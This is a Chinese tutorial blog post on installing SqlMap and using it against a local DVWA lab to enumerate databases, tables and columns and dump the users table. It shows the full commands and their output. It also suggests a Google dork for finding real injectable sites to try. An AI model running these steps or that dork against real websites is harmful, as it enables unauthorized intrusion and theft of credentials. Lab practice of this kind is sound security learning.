SqlMap 初尝试
SqlMap 初尝试
什么是SqlMap
Sqlmap是开源的自动化SQL注入工具,由Python写成,具有如下特点:
完全支持MySQL、Oracle、PostgreSQL、Microsoft SQL Server、Microsoft Access、IBM DB2、SQLite、Firebird、Sybase、SAP MaxDB、HSQLDB和Informix等多种数据库管理系统。
完全支持布尔型盲注、时间型盲注、基于错误信息的注入、联合查询注入和堆查询注入。
在数据库证书、IP地址、端口和数据库名等条件允许的情况下支持不通过SQL注入点而直接连接数据库。
支持枚举用户、密码、哈希、权限、角色、数据库、数据表和列。
支持自动识别密码哈希格式并通过字典破解密码哈希。
支持完全地下载某个数据库中的某个表,也可以只下载某个表中的某几列,甚至只下载某一列中的部分数据,这完全取决于用户的选择。
支持在数据库管理系统中搜索指定的数据库名、表名或列名
简单来说SqlMap就是一中SQL注入的工具,能实现对一些网站的SQL注入和获取数据库信息。
如何安装SqlMap
因为SqlMap是基于python,所以需要先安装本地的python环境
Python2.7.11下载:
下载地址:https://www.python.org/downloads/
- 安装步骤可以查看其它的python的安装教程,蛮简单。
- 安装完成后,重启系统,查看是否生效,“Win+R”,输入cmd,然后输入python
通过 http://www.sqlmap.org/ 下载SqlMap的zip包
- 通过在桌面创建快捷方式,实现桌面的SqlMap快捷键。
- 输入 cmd
- 输入自定义名称
- 将sqlmap的文件夹拷贝到python下
修改起始位置如下,修改为python下的sqlmap的地址
- 直接启动,如下
SqlMap的实验
通过googel的inurl:"/.asp?id="
搜索一些可被注入的网站进行尝试
我尝试的是通过DVWA的SQL 盲注入。
如果有兴趣,可以尝试先从DVWA的靶机开始。,DVWA是一款不错Web渗透的入门靶机
通过 sqlmap.py -u "http://127.0.0.1:8081/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=3pdq351sispu8cugkmpu7afhi4" --batch "
实现对靶机的验证看能否注入攻击
ps:--batch 是指之后所有的选择参数都是默认的选项。
根据图片显示攻击可以注入,并获取到了后端的配置信息,以及将其内容输出成为了一个文档
测试成功,通过 --dbs命令查看后台的Databases,ps 因为 --batch为默认参数选择,所以必需为最后一个参数指令 。
根据后台显示以下几个databases,因为网站为dvwa,所以选中dvwa数据库,查看tables分布
[*] dvwa [*] information_schema [*] mysql [*] performance_schema [*] test
通过参数 -D 指定database 通过 --tables 显示所有的table ,如下图有两个表,因为要有攻击性,所以选择 users的表
+-----------+ | guestbook | | users | +-----------+
-T参数指定表为users,--columns查看该表的所有列,查看到users表的表结构有这8个字段组成
[8 columns] +--------------+-------------+ | Column | Type | +--------------+-------------+ | user | varchar(15) | | avatar | varchar(70) | | failed_login | int(3) | | first_name | varchar(15) | | last_login | timestamp | | last_name | varchar(15) | | password | varchar(32) | | user_id | int(6) | +--------------+-------------+
通过 --dump显示出所有的内容
如果字段名过多,可以尝试通过 -C "user,password" 来实现指定字段的筛选
但是所有的数据不可能会在命令行上看,这样很不不方便。没关系,sqlmap在你执行 --dump命令时,已经将数据文件下载到了本地,可以随时查看文件数据,文件保存为CSV类别。
以上就是SqlMap的简单使用,至于为什么要学习这个攻击的技术,因为进攻是最好的防守啊,学会了如何攻击,才知道如何防御别人的攻击。

低调大师中文资讯倾力打造互联网数据资讯、行业资源、电子商务、移动互联网、网络营销平台。
持续更新报道IT业界、互联网、市场资讯、驱动更新,是最及时权威的产业资讯及硬件资讯报道平台。
转载内容版权归作者及来源网站所有,本站原创内容转载请注明来源。
- 上一篇
python函数
Python内置了很多有用的函数,我们可以直接调用。 要调用一个函数,需要知道函数的名称和参数,比如求绝对值的函数abs,只有一个参数。可以直接从Python的官方网站查看文档: 官方文档: http://docs.python.org/3/library/functions.html#abs 比如求绝对值的函数abs: #abs绝对值函数 print(abs(-12))》12 常用的方法: #一些常用的方法 #range整数数组 print(list(range(2,11))) 》[2, 3, 4, 5, 6, 7, 8, 9, 10] #int整数转换 print(int(-989.222)) 》-989 #max最大值 print(max(1,3,44,2,)) 》44 #hex十六进制转换 print(hex(256)) 》0x100 定义函数 使用def ,依次写函数名,参数,冒号:,在缩进块中编写函数体,使用return语句返回值 #def定义方法 def my_abs(x): if x>0: print(x) else: print(-x) #调用函数 my_abs...
- 下一篇
JakartaEE Struts2使用
1. Struts2下载 解压后的目录结构如下: 图1.png 从一个高水平角度看,Struts2 是一个MVC拉动的(或MVC2)框架,Struts2 的模型-视图-控制器模式是通过以下五个核心部分进行实现的: 操作(Actions) 拦截器(Interceptors) 值栈(Value Stack)/OGNL 结果(Result)/结果类型 视图技术 图2.png 请求生命周期 通过上述图片的描述,我们可以依照下面几点解释在Struts2 中用户的请求生命周期: 用户发送一个资源需求的请求到服务器(例如:页面)。 核心控制器查看请求后确定适当的动作。 使用验证、文件上传等配置拦截器功能。 执行选择的动作来完成请求的操作。 如果需要的话,配置的拦截器可做任何后期处理。 最后,由视图显示结果并返回给用户。 2. HelloWorld程序 1. 四个组件: Action(操作) 创建一个动作类,包含完整的业务逻辑并控制用户、模型以及视图间的交互。 Interceptors(拦截器) 这是控制器的一部分,可依据需求创建拦截器,或使用现有的拦截器。 View(视图) 创建一个JSP与用户进行...
相关文章
文章评论
共有0条评论来说两句吧...
文章二维码
点击排行
推荐阅读
最新文章
- CentOS8编译安装MySQL8.0.19
- SpringBoot2整合MyBatis,连接MySql数据库做增删改查操作
- Mario游戏-低调大师作品
- CentOS7编译安装Gcc9.2.0,解决mysql等软件编译问题
- CentOS7编译安装Cmake3.16.3,解决mysql等软件编译问题
- SpringBoot2更换Tomcat为Jetty,小型站点的福音
- SpringBoot2整合Thymeleaf,官方推荐html解决方案
- Linux系统CentOS6、CentOS7手动修改IP地址
- CentOS8安装Docker,最新的服务器搭配容器使用
- CentOS7安装Docker,走上虚拟化容器引擎之路